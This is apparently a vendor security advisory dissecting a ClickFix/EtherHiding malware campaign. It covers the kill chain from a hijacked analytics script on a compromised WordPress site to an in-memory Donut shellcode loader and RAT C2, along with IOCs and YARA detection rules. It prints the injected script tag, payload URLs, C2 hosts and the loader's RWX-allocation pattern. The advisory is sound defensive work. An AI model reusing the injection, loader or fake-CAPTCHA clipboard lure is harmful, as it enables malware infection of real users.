Security Advisory · 2026-06-10

Omegatech EtherHiding
ClickFix V9

A V8 infrastructure rotation introducing separated beacon/payload stages, aged AWS domain abuse, and a C# P/Invoke stub identical to V8 at the source level — confirmed via PS process memory dump. Full compromise in 26 seconds from first browser contact.

Campaign infrastructure staged over 26 hours, 25 days before detonation
2026-05-15 03:40
ksrndkehqnwntyxlhgto.com
DNS changed
Reg. 2024-02-27
2026-05-16 02:14
process.iconnode.com
DNS changed
Reg. 2014-06-15 (aged)
2026-06-10 19:58
williamhale.co.uk
campaign live
ANY.RUN ea5e5bd2
⚠ Both AWS domains changed DNS within 26 hours of each other — same operator, same prep window. iconnode.com was registered in 2014 and sat dormant for 12 years before being weaponised. High reputation score (95/100) was the entire point.
26s
Time to active C2
12yr
iconnode.com aged domain
1,254
Chars injected into legit JS
2
PS process dumps confirming tid (not sid)
2
WC account pools (137116 + 123340)
Kill Chain
STAGE 0 T+0.00s  |  2026-06-10 19:58:12 UTC
Lure page — williamhale.co.uk
Compromised WordPress site · UK commercial CCTV & security business
Brotli-compressed HTML (31 KB → 134 KB) served via Cloudflare 141.193.213.11
Injected script tag: <script src="//s.ksrndkehqnwntyxlhgto.com/137116.js" id="whatconverts-tracking-script-js">
dns-prefetch for ksrndkehqnwntyxlhgto.com injected in <head> to pre-warm resolver before script tag loads
CF challenge active at detonation (timestamp 1781121491 = 19:58:11 UTC)
Industry-aware injection: WhatConverts is a plausible lead-tracking tool for a UK CCTV/trades business
IOC SHA256: 0F34DB2432CAF35568AD5F415389FCC2871CEE3AE47A38CCBC1AC4B993006449 (f_0002a6 Edge cache entry)
STAGE 1 T+0.00–0.28s  |  TLS to AWS (18.245.60.9 + 13.248.238.122)
JS beacon — 137116.js
Hijacked WhatConverts tracker · 57,362 bytes · 1,254-char malicious prefix · NEW V9 ARCHITECTURE
POST //process.iconnode.com/google-ads/ — silent C2 liveness beacon. No body. HTTP 200 sets yrejzpicqjfxoquxuuaw=true (beacon-confirmed flag). NEW in V9 — not present in V1–V8.
POST //p.ksrndkehqnwntyxlhgto.com/verification/ — infection confirmation callback. Sends wc_profile_id=137116. Conditional on wc_verification cookie.
Dedup guards use random variable names: phbqslixugkynefhnzol (beacon-sent) and yrejzpicqjfxoquxuuaw (beacon-confirmed)
Remainder of file is legitimate WhatConverts account 137116 code — retained in full to avoid detection by site owner
Multiple victim pools confirmed: account 123340.js also observed on same infrastructure (separate lure site)
IOC SHA256: 86C9D146201932FEB8D6B42161938F1C145C8989E7C753AAC876704D365724E9 (137116.js · 57,362 bytes)
STAGE 2 T+4.40s  |  1,124 pkts inbound · 1.26 MB
EtherHiding overlay — dntds.shop/teamrepo
BSC-backed encrypted payload · ClickFix CAPTCHA social engineering
TLS to 178.16.53.137:443 (dntds.shop · OMEGATECH-AS AS202412 · Seychelles BPH)
GET /teamrepo?rnd=<float> — cache-busting float param. Endpoint rotated from /jsrepo used in V7b. Same host, same ASN.
1,260,921 bytes returned encrypted — contains ClickFix overlay HTML + C# loader source code
Fake Cloudflare CAPTCHA overlay rendered in-page — instructs user to open Windows Terminal
PowerShell command written to clipboard via navigator.clipboard / execCommand copy — user-assisted execution bypasses traditional security controls
IOC dntds.shop → 178.16.53.137 (AS202412)  |  URL pattern: /teamrepo?rnd=
STAGE 3 T+22.28s  |  HTTP plaintext · 1,610 bytes recovered
PowerShell download cradle — 91.92.240.121
Full loader source recovered from PCAP + PS process memory dump · C# stub embedded inline
User pastes clipboard command → WindowsPowerShell/5.1.19041.4046 executes
GET http://91.92.240.121/ — bare IP, no TLS. Server: Apache/2.4.66 (Debian) · OMEGATECH-AS · Spamhaus DROP groups 14 + 31
Response: PS script with C# stub class xlsZNpdJdwlmMh embedded as here-string. ALSO recovered from PS process memory dump at offset 0x006c7975
Variable map: $ydPyHgCTOK=URL · $qubnxYmvaK=WebRequest · $cdtctMBntzxi=raw_bytes · $RldCBOBdan=length · $kLUaYgtCb=alloc_ptr · $uiNEvuLJdSskH=thread_handle · $fqriSDP=thread_id
VirtualAlloc flags: 0x1000 | 0x2000 = 0x3000 (MEM_COMMIT | MEM_RESERVE) · Protection: 0x40 = PAGE_EXECUTE_READWRITE
WaitForSingleObject timeout: 30,000 ms (30 seconds)
csc.exe compile flags recovered from memory: /debug- /optimize+ /warnaserror /optimize+ (double /optimize+ is a notable quirk)
IOC 91.92.240.121:80 · Apache/2.4.66 Debian · Spamhaus DROP groups 14 + 31 · AS202412
STAGE 4 T+23.97s  |  HTTP plaintext · both binaries confirmed
Payload fetch — 158.94.208.104/x7GkP2mQ9zL4/
Two binaries · path unchanged from V8 · MZER PE + Donut shellcode confirmed via PCAP
GET /x7GkP2mQ9zL4/student_l.bin → 53,323 bytes · First bytes: e8 c0 6d 00 (x86 CALL, no MZ header) = raw Donut shellcode. UA: WindowsPowerShell/5.1.19041.4046
GET /x7GkP2mQ9zL4/student_s.bin → 308,736 bytes · Magic: 4d 5a 45 52 (MZ+ER) = MZER loader PE, matches V8 memdumps. UA: powershell (bare — different caller)
Label inversion (PCAP-confirmed): _l = small Donut blob (53 KB) · _s = large MZER PE (309 KB). Inverted from intuition — ANY.RUN labels were misleading.
UA divergence reveals two-stage fetch: PS cradle retrieves _l directly; Donut shellcode independently fetches _s with a different UA string
Both files: Server: Apache/2.4.52 (Ubuntu) · Last-Modified: 2026-06-03 · path prefix /x7GkP2mQ9zL4/ unchanged from V8
IOC http://158.94.208.104/x7GkP2mQ9zL4/student_l.bin  +  student_s.bin · AS202412
STAGE 5 T+~25s  |  In-memory · YARA confirmed
In-memory shellcode injection — powershell.exe → svchost CDPUserSvc
csc.exe compiles C# stub · VirtualAlloc RWX · Donut loads MZER PE · svchost injected
Add-Type compiles class xlsZNpdJdwlmMhzgxr4teh.dll dropped to %TEMP% via csc.exe + cvtres.exe
VirtualAlloc(IntPtr.Zero, size, 0x3000, 0x40) → RWX page in powershell.exe · Marshal.Copy writes Donut blob
CreateThread → Donut executes, reflectively loads MZER PE → injects into svchost.exe CDPUserSvc (PID 4456)
YARA detections: DONUTLOADER (powershell.exe) · GENERIC (powershell + svchost)
Tier-1 dev fingerprint: abbreviated P/Invoke params (a, sz, t, p, ta, ss, sa, cf, h, ms) identical to V8 flferzre stub. Memory dump confirms out uint tid — same as V8. No out-param mutation.
zgxr4teh.dll carved from PS process memory dump (offset 0x00953fc0): PE32 x86 (0x014c) · 3 sections · .text only 1,140 bytes (minimal stub, zero padding) · EP RVA 0x246e · memory hash differs from on-disk (relocation applied at load)
Donut CALL pattern e8 c0 6d 00 resident in PS process memory: 5 hits (dump1) → 8 hits (dump2) — shellcode was actively executing between the two snapshots
IOC zgxr4teh.dll on-disk SHA256: FEF8F43BF82BAA199C6C2AC67C50103CF66D4524B24F6D96833CFD5794C99244 · mem-carved SHA256: 6D02D3AB470C5114BF8FDA6FC30CD179BA4FCE5876B0EBC9B92852BF979F4AD2
STAGE 6 T+25.97s  |  :3038 binary protocol
RAT C2 established — 91.92.243.161:3038
svchost CDPUserSvc beacons to OMEGATECH-AS · MSIL/Generic RAT · length-prefixed binary protocol
svchost.exe (PID 4456) connects to 91.92.243.161:3038 · OMEGATECH-AS AS202412 · Seychelles BPH
Binary handshake: client 0x40 0x01 0x00 0x00 (328 bytes) → server 0x20 0x01 0x00 0x00 (292 bytes) · length-prefixed protocol
Detections: MSIL/Generic RAT + Win32/Generic Agent C2 · MSIL classification suggests .NET implant (likely CobaltStrike or Sliver beacon)
Spamhaus DROP listed: group 14 (same list as 91.92.240.121 stage-3 host)
Time from first browser contact to active C2: 25.97 seconds
IOC 91.92.243.161:3038 · OMEGATECH-AS202412 · Spamhaus DROP group 14
Infrastructure Staging

⚠ Aged Domain Abuse — 12-year dormant asset weaponised

process.iconnode.com was registered on 2014-06-15 and sat dormant for over 12 years before its DNS was updated on 2026-05-16 at 02:14 UTC — exactly 26 hours after ksrndkehqnwntyxlhgto.com was updated on 2026-05-15 at 03:40 UTC. The coordinated 24-hour prep window, combined with an aged domain with a 95/100 reputation score, is textbook aged domain abuse: the threat actor acquired or maintained the domain specifically to weaponise its trust score at campaign launch, bypassing reputation-based blocklists entirely.

process.iconnode.com
Registered2014-06-15 09:44 UTC
Last DNS change2026-05-16 02:14 UTC
BGP origin54.208.0.0/15 · AS14618
Registrar/hostAmazon AWS (both)
RoleV9 C2 beacon · /google-ads/ silent POST
Dormant 12 years → weaponised. Reputation score 95/100 at detonation. New IOC — not in V1–V8.
ksrndkehqnwntyxlhgto.com
Registered2024-02-27 11:43 UTC
Last DNS change2026-05-15 03:40 UTC
BGP origin54.208.0.0/15 · AS14618
Registrar/hostAmazon Registrar + AWS
RoleCDN (s.) hijacked JS · exfil (p.) beacon/keyword
DNS changed 26 hours before iconnode.com. Same operator, same prep window. AWS abuse reported 2026-06-10.
V8 vs V9 — Key Evolutions
ChangeV8V9
Stage architectureSingle injected script: beacon + overlay combinedSeparated: JS beacon stage distinct from EtherHiding payload deliveryNEW
C2 beaconNone — no pre-delivery beacon in V1–V8process.iconnode.com/google-ads/ · silent POST · AWS aged domainNEW
EtherHiding endpointdntds.shop/jsrepodntds.shop/teamrepo · same host, rotated path
Lure sitepenrosept.com (physio clinic)williamhale.co.uk (CCTV business)
Tracker coverGeneric plugin injectionWhatConverts account 137116 cloned + re-hosted on AWS CDN. 95/100 reputation.
Multiple poolsSingle lure per campaignAccounts 137116 + 123340 both observed — parallel victim poolsNEW
Payload namingV8 conventionstudent_l.bin (Donut 53 KB) + student_s.bin (MZER PE 309 KB) · labels inverted from intuition
C# stub out paramout uint tidout uint tid — IDENTICAL. Memory dump confirmed. No out-param mutation in V9.CORRECTED
Staging server158.94.208.104 / /x7GkP2mQ9zL4/158.94.208.104 / /x7GkP2mQ9zL4/ · unchanged
Tier-1 dev fingerprintAbbreviated P/Invoke params (a, sz, t, p…)Identical · same developer confirmed
Key Forensic Findings — PCAP ea5e5bd2
LOADER SOURCE RECOVERED
Full 1,610-byte PowerShell stage-2 loader recovered from two independent sources: PCAP plaintext (HTTP from 91.92.240.121:80) and PS process memory dump (offset 0x006c7975). Full variable map recovered: $ydPyHgCTOK (URL) · $qubnxYmvaK (WebRequest) · $cdtctMBntzxi (bytes) · $kLUaYgtCb (alloc ptr) · $uiNEvuLJdSskH (thread handle). Confirms VirtualAlloc(0x3000, 0x40=RWX), CreateThread, WaitForSingleObject(30s). csc.exe compile flags: /debug- /optimize+ /warnaserror /optimize+. Loader hashes: MD5 A18E3B928BBC92FC72090F1313944026 · SHA256 FFE7EEEF…FD21A56.
PAYLOAD LABEL INVERSION
ANY.RUN size labels were inverted. PCAP confirms: student_l.bin = 53,323 bytes (raw x86 shellcode, first bytes e8 c0 6d 00 = CALL, no MZ header) · student_s.bin = 308,736 bytes (MZER PE, magic 4d 5a 45 52). _l = Donut blob, _s = shellcode-carrying PE. STIX bundle corrected accordingly.
MZER MAGIC CONFIRMED
student_s.bin magic bytes 4d 5a 45 52 (MZ+ER) match the MZER loader signature identified in V8 memdump analysis. Same Tier-1 developer payload format reused across V8 and V9.
DUAL UA TELLS
student_l.bin fetched with UA WindowsPowerShell/5.1.19041.4046 (PS cradle). student_s.bin fetched with bare UA powershell — different process reaching back to staging server, confirming the Donut shellcode independently fetches the MZER PE.
C2 HANDSHAKE
RAT handshake at 91.92.243.161:3038: client sends 40 01 00 00 (328 bytes), server responds 20 01 00 00 (292 bytes). Length-prefixed binary protocol. MSIL classification suggests .NET implant — consistent with CobaltStrike or Sliver beacon profile.
MEM DUMP — tid CONFIRMED
Both PS process memory dumps confirm out uint tid (4 hits each) — no out-param mutation between V8 and V9. The earlier tid→sid notation was incorrect and has been retracted. V8 and V9 stubs are source-identical at the P/Invoke level. YARA rule catches both on abbreviated param style alone; no condition adjustment needed.
PE CARVED FROM RAM
zgxr4teh.dll carved from process memory at offset 0x00953fc0 (dump-6a29c211). PE32 x86 · 3 sections · .text = 1,140 bytes (minimal stub, zero junk) · EP RVA 0x246e. Memory hash (6D02D3AB…) differs from on-disk (FEF8F43B…) due to relocation — both documented. Donut CALL bytes e8 c0 6d 00: 5 hits in dump1, 8 hits in dump2 — shellcode actively executing between snapshots.
26-SECOND CHAIN
Full attack chain from first browser contact (T+0.00s) to active RAT C2 (T+25.97s) completes in under 26 seconds. No persistence mechanism observed within 60-second sandbox window — RAT likely handles persistence post-check-in.
YARA Detection Rules
SecureLeaf_Omegatech_CSharp_PInvoke_Loader_V8V9

Matches the abbreviated P/Invoke parameter style that is the Tier-1 developer's coding fingerprint across V8 and V9. Process memory dump confirms both stubs use out uint tid — no out-param mutation between versions. Rule catches both on the abbreviation style alone.

rule SecureLeaf_Omegatech_CSharp_PInvoke_Loader_V8V9 {
    meta:
        description = "Omegatech ClickFix C# loader V8+V9 - Tier-1 dev fingerprint"
        author      = "SecureLeaf / Dispensight"
        date        = "2026-06-10"
        reference   = "SL-ADV-2026-WP-001-V9"
    strings:
        $valloc  = "VirtualAlloc(IntPtr a, uint sz, uint t, uint p)" ascii
        $cthread = "CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf" ascii
        $wfso    = "WaitForSingleObject(IntPtr h, uint ms)" ascii
        $interop = "System.Runtime.InteropServices" ascii
        $kernel  = "kernel32.dll" ascii
    condition:
        $interop and $kernel and $valloc and $cthread and $wfso
}
SecureLeaf_Omegatech_V9_JS_Beacon

Detects the injected malicious prefix in hijacked WhatConverts or similar analytics scripts. The two random-named dedup guards (phbqslixugkynefhnzol, yrejzpicqjfxoquxuuaw) are unique to this campaign and extremely unlikely to appear in legitimate code.

rule SecureLeaf_Omegatech_V9_JS_Beacon {
    meta:
        description = "Omegatech V9 injected JS beacon prefix in hijacked tracker"
        author      = "SecureLeaf / Dispensight"
        date        = "2026-06-10"
        reference   = "SL-ADV-2026-WP-001-V9"
    strings:
        $iconnode = "process.iconnode.com/google-ads/" ascii
        $verif    = "p.ksrndkehqnwntyxlhgto.com/verification/" ascii
        $flag1    = "phbqslixugkynefhnzol" ascii
        $flag2    = "yrejzpicqjfxoquxuuaw" ascii
        $wc_id    = "wc_profile_id" ascii
    condition:
        ($iconnode or $verif) and ($flag1 or $flag2) and $wc_id
}
IOC Quick Reference
TypeValueContext
IP178.16.53.137dntds.shop — EtherHiding /teamrepo C2 (AS202412 SC)
IP91.92.240.121PS C2 / stage-3 loader (Spamhaus DROP 14+31 · AS202412)
IP91.92.243.161RAT C2 :3038 — MSIL/Generic (Spamhaus DROP 14 · AS202412)
IP158.94.208.104Staging — student_*.bin payloads (AS202412 · unchanged V8+V9)
Domainprocess.iconnode.comNEW V9Silent C2 beacon · AWS aged domain (reg. 2014) · /google-ads/
Domainksrndkehqnwntyxlhgto.comAttacker CDN (AWS) — s. hijacked JS · p. exfil/beacon endpoints
Domaindntds.shopEtherHiding C2 (AS202412 · /teamrepo V9 · /jsrepo V7b)
URL…/x7GkP2mQ9zL4/student_l.binDonut shellcode 53 KB · first bytes e8 c0 6d 00 (CALL, no MZ)
URL…/x7GkP2mQ9zL4/student_s.binMZER PE 309 KB · magic 4d 5a 45 52
URLdntds.shop/teamrepo?rnd=EtherHiding payload endpoint · ?rnd= float cache-busting
SHA256F833D774…C99244zgxr4teh.0.cs — V9 C# P/Invoke stub · memory-confirmed out uint tid (identical to V8)
SHA256FFE7EEEF…D21A56ps_loader_stage2.ps1 — 1,610-byte PS loader · recovered from PCAP + memory dump
SHA2566D02D3AB…F4AD2zgxr4teh.dll mem-carved — PE32 x86 post-relocation · dump-6a29c211 offset 0x00953fc0
SHA25686C9D146…724E9137116.js — hijacked WC beacon (57,362 bytes)
SHA2560F34DB24…6449f_0002a6 — Brotli lure page cache (williamhale.co.uk)